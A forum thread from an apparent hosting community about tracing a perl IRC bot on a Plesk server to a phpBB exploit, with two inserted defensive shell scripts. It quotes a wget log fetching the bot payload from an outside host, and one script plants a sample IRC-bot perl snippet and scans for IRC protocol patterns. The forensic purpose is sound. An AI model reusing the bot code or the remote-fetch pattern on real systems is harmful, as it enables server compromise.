Full Version: IRC bot found. Need to determine which Plesk virtual host is using it
The Planet Forums > Control Panels > Plesk
gustave
I found that over the last 3 days my RHEL 3.0 server w/ many virtual hosts has had a high load. perl is the culprit when viewing with top. Someone on my server is using an irc bot as when I run lsof -i |grep perl I get: ftp.pqa.com:ircd

How do I determine which site I host is running this?
It just shows apache as the owner of the process.

Assistance in determining the source site appreciated.

Gus
Ric
That's one of the many, many reasons you never give shell access to clients.

grep -R your vhosts dir for a partial of the bot process name and see if that turns it up. If that doesn't find it, grep for irc or bot.

Probably a better way but nothing else comes to mind right now.

Rick
gustave
Doing so now. The strange thing, though, is that it is running as user apache.
So it's like it is an uploaded perl script, not a shell-run ./ one.

Thoughts? Is there such a web based irc bot?

Thank you
Ric
None that I specifically know of, but that means nothing. That type of operation would explain unusually high loads if it is doing a lot of http updating to a web page; generally IRC bots are not cpu intensive.

After thinking about it for a min, it has to be a perl script if that's what it's using. Grepping for it should still find the thing, but it might take a while if you have a lot of clients.

Rick
Ric
If it's a perl script it will be in the suexec log.
gustave
nothing in the suexec log

Other thoughts? This is really hard to nail down. Nothing grepping for ircd in the entire vhosts directory either.
NightStorm
Not sure if it will help you in this exact case, but I have Webmin installed on my server (alongside Plesk). One of the neat features of it is a webpage-based listing of running processes... but when you click on the process PID, it will let you access a further list of files that are being accessed by it.
Likely, if the bot is executed with perl, it will show up in that listing.
Ric
ircd is the wrong keyword

grep irc /home/httpd/vhosts/*/cgi-bin/*
grep bot /home/httpd/vhosts/*/cgi-bin/*

assuming there is probably an "irc" or "bot" string in the script somewhere.
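The two questions in this thread, "which vhost owns a perl process that shows up as user apache" and "where in the vhost tree is the script", can both be answered from the shell. The following is an added example written for this thread, not code posted by Ric or gustave or shipped with Plesk: `proc_origin` reads a process's working directory, executable and command line from /proc (a CGI-launched script usually keeps the cgi-bin or tmp directory it was started from as its cwd, which names the vhost even when the owner is apache), and `scan_vhosts` extends the `grep irc` / `grep bot` idea to the whole vhost tree with a constructed list of IRC protocol indicators. `make_sample_tree` builds a throwaway, constructed vhost layout so the scan can be tried offline; the hostnames, file names and indicator patterns in it are assumptions, not values from the thread.

```shell
#!/bin/sh
# Added example for this thread (not the forum's or Plesk's own code).

# proc_origin PID: print cwd, executable and command line of a process.
# Requires a Linux /proc; fails with a message elsewhere.
proc_origin() {
    pid=$1
    [ -d "/proc/$pid" ] || { echo "no /proc entry for pid $pid" >&2; return 1; }
    printf 'cwd=%s\n' "$(readlink "/proc/$pid/cwd" 2>/dev/null)"
    printf 'exe=%s\n' "$(readlink "/proc/$pid/exe" 2>/dev/null)"
    # cmdline is NUL-separated; show it as one line
    printf 'cmdline=%s\n' "$(tr '\0' ' ' < "/proc/$pid/cmdline")"
}

# scan_vhosts ROOT: list files under ROOT containing IRC-protocol
# indicators (constructed pattern list: IRC verbs and the default ircd
# port). Run it over the vhost root, e.g. /home/httpd/vhosts.
scan_vhosts() {
    root=$1
    grep -rlE -e 'PRIVMSG|NICK |JOIN #|6667' "$root" 2>/dev/null
}

# make_sample_tree: constructed, throwaway vhost layout for a dry run:
# a clean perl CGI, a clean PHP page and one planted IRC-bot-like perl
# script dropped into a vhost's tmp dir. Prints the root directory.
make_sample_tree() {
    root=$(mktemp -d)
    mkdir -p "$root/example.test/cgi-bin" "$root/other.test/httpdocs" "$root/other.test/tmp"
    printf '#!/usr/bin/perl\nprint "Content-type: text/html\\n\\nhello\\n";\n' \
        > "$root/example.test/cgi-bin/hello.cgi"
    printf '<?php echo "hi"; ?>\n' > "$root/other.test/httpdocs/index.php"
    printf '#!/usr/bin/perl\n$sock = IO::Socket::INET->new(PeerAddr=>"irc.example", PeerPort=>6667);\nprint $sock "NICK dbot\\r\\n";\nprint $sock "JOIN #ch\\r\\n";\n' \
        > "$root/other.test/tmp/d0s3.txt"
    echo "$root"
}

# Dry run against the constructed tree, then against the current shell.
if [ "${0##*/}" != "sh" ] && [ -z "$SCAN_NO_DEMO" ]; then
    demo_root=$(make_sample_tree)
    echo "suspicious files under $demo_root:"
    scan_vhosts "$demo_root"
    rm -rf "$demo_root"
    proc_origin $$ || true
fi
```

On a live box, take the PID from `ps -u apache -o pid,cmd` or `lsof -i | grep perl`, feed it to `proc_origin`, and `ls -l /proc/PID/fd` will additionally show which log or socket files the process holds open.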
gustave
OK, I found a file in my /tmp called d0s3.txt

Here is the log file from error_log.1

--19:21:21-- http://@#!@#!@#!@#!yeah.freesuperhost.com/d0s3.txt
=> `d0s3.txt'
Resolving @#!@#!@#!@#!yeah.freesuperhost.com... done.
Connecting to @#!@#!@#!@#!yeah.freesuperhost.com[70.84.229.131]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 20,419 [text/plain]

0K .......... ......... 100% 74.68 KB/s

19:21:23 (74.68 KB/s) - `d0s3.txt' saved [20419/20419]


How do I find out who did this I wonder?
Ric
security hole somewhere, probably still open. Seen several reports of the phpBB pre-2.0.11 hack writing and executing files in tmp dir. There are posts in the forum about securing that and other dirs too, do a search.
agruetz
You may wish to install suphp, which will force php scripts to run like suexec does with perl. This has a lot of security advantages and also aids in tracking down problem users. Here is a how-to I wrote for it.

http://devzone.helixdevelopment.com/cms/in...id=16&Itemid=42
eSupport.org.ua
QUOTE
Originally posted by gustave

How do I find out who did this I wonder?


This is the wrong question. The right one is: WHY can someone do it on my server?
The answer is: your server was UNSECURED.

You can read a lot of books about server security [mod edit]spam deleted. No spam please[/mod edit]Is it your choice?
Ric
QUOTE
Originally posted by eSupport.org.ua
You can read a lot of books about server security


I can suggest some books on the English language if you like.
gustave
The exploit actually came from a user who was running a pre-2.0.11 version of phpBB.

Nasty exploit. So, unsecured? Not really. It's hard to monitor all software being used by people you host.

So eSupport.org.ua, you have no idea what you are talking about. Thanks for coming out though. That was some valuable info about what questions are valid.
NightStorm
There's a small piece of code you can run from SSH that will scan your server, and rewrite all the exploitable files to patch them...
I ran the fix, and it seemed to work for me. Might be something to look into.
gustave
Where can we get that code? Sounds handy.

Thanks
NightStorm
Just so you know, I'm looking...
It's in the General section, I think... 1 sec, I'll go grab it and edit my post to include it.

Found it... had to dig a bit.
http://forum.ev1servers.net/showthread.php...t=viewtopic.php

If you have mod_security installed (I suggest slapping it on your server anyway, just because of how well it can secure some exploits), there's a patch you can load into that as well.
gustave
NightStorm,

Thank you. That is excellent.

Mark
Ric
I agree that the biggest security risk is hosting people! No matter what you do it seems like there is always something a user can screw up on to leave you open to a broadside.

phpBB is a fine package, it really is. I do have a problem with their not having a security mailing list though. With a project and userbase that size it is nothing short of irresponsible not having a security listserv setup.

We caught an exploit in process via other monitoring we have in place the day the exploit went into the wild. It took a trip to the phpBB board to find the patch and then as we always do, I upgraded all instances running on our servers. You just can't trust users to be watchful or prompt about upgrading scripts and since phpBB is such a big target, it is exploited quite frequently.

There were several threads about them starting a security listserv in their forum but they are slow to act and have not promised anything yet. Checking their board multiple times daily is not an option so if they don't introduce a mailing list soon, we are just going to flat out ban phpBB from our servers.

To get to the point, one thing we do is cron a script that looks for installations of phpBB and other commonly exploited scripts every night. I explained that here...

http://forum.ev1servers.net/showthread.php...&threadid=51203

It isn't perfect but at least we know who is running the most dangerous stuff and can notify them the instant a security patch is released. If it is a package we use on one of our own domains like phpBB or osCommerce, we just upgrade everyone who has it installed when we do ours.

Rick
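Ric's nightly cron job that inventories phpBB installs is easy to reproduce. The following is an added example written for this thread, not Ric's script and not anything from phpBB or Plesk: `find_phpbb` walks a vhost root, locates each phpBB 2 install by its `includes/constants.php`, reads the version out of it and marks anything older than 2.0.11 as VULNERABLE. It assumes (from memory of phpBB 2, not stated in the thread) that the file carries a line of the form `define('PHPBB_VERSION', '.0.NN');` and only handles the 2.0.x series; `make_phpbb_sample` builds a constructed tree with one old and one patched install so the report can be tried offline.

```shell
#!/bin/sh
# Added example for this thread (not Ric's cron script).

# find_phpbb ROOT: print "<install dir> <version> <status>" for every
# phpBB 2 install below ROOT (assumed layout: includes/constants.php
# holding define('PHPBB_VERSION', '.0.NN')). 2.0.x below 2.0.11 is
# reported VULNERABLE, everything else OK.
find_phpbb() {
    root=$1
    find "$root" -type f -path '*/includes/constants.php' 2>/dev/null |
    while read -r f; do
        ver=$(sed -n "s/.*define('PHPBB_VERSION', *'\([^']*\)').*/\1/p" "$f" | head -n 1)
        [ -n "$ver" ] || continue          # not a phpBB 2 constants.php
        patch=${ver##*.}                   # ".0.10" -> "10"
        dir=${f%/includes/constants.php}
        if [ "$patch" -lt 11 ] 2>/dev/null; then status=VULNERABLE; else status=OK; fi
        printf '%s 2%s %s\n' "$dir" "$ver" "$status"
    done
}

# make_phpbb_sample: constructed throwaway tree with one pre-2.0.11 install
# and one patched install. Prints the root directory.
make_phpbb_sample() {
    root=$(mktemp -d)
    mkdir -p "$root/old.test/httpdocs/forum/includes" "$root/new.test/httpdocs/bb/includes"
    printf "<?php\ndefine('PHPBB_VERSION', '.0.10');\n?>\n" \
        > "$root/old.test/httpdocs/forum/includes/constants.php"
    printf "<?php\ndefine('PHPBB_VERSION', '.0.11');\n?>\n" \
        > "$root/new.test/httpdocs/bb/includes/constants.php"
    echo "$root"
}

# Dry run over the constructed tree. For a nightly job, point find_phpbb
# at the real vhost root instead, e.g. from cron (assumed path):
#   0 3 * * * /usr/local/sbin/find_phpbb.sh /home/httpd/vhosts | mail -s "phpBB inventory" root
if [ -z "$PHPBB_NO_DEMO" ]; then
    demo_root=$(make_phpbb_sample)
    find_phpbb "$demo_root"
    rm -rf "$demo_root"
fi
```

The report lists the install directory, so the owning vhost (the first path component under the vhost root) is visible at a glance, which is what is needed to notify the right customer when a patch is released.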
Ric
QUOTE
Originally posted by agruetz
You may wish to install suphp, which will force php scripts to run like suexec does with perl. This has a lot of security advantages and also aids in tracking down problem users. Here is a how-to I wrote for it.

http://devzone.helixdevelopment.com/cms/in...id=16&Itemid=42


That looks great agruetz, how does it play with Plesk? It always scares me to fool with server-wide settings for php or any other packages Plesk integrates. Is it likely to cause problems with Plesk upgrades?

Rick
NightStorm
One of the worst things I've seen thus far is a user that creates his own php script (a very nice one, at that) that uses MySQL for data storage.
It worked beautifully, except that the user coding it put in a string to open the connection to MySQL, but did not close the connection at the end of the script.
The page ended up getting upwards of 10,000 hits a day... now, you do the math and imagine the impact of 10,000 improperly opened MySQL sockets sitting there lingering, because the script that called them failed to properly close them at the end.